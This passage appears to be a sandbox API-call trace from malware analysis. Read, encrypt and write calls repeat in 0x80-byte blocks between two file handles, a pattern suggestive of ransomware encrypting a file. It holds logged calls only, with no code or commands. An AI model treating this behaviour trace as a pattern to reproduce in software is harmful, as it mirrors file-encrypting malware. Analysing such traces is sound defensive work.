nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.076] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.076] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.077] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.077] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.078] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.078] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.078] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.078] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.078] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.078] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.078] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.078] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.079] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.079] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0042.080] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0042.080] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, 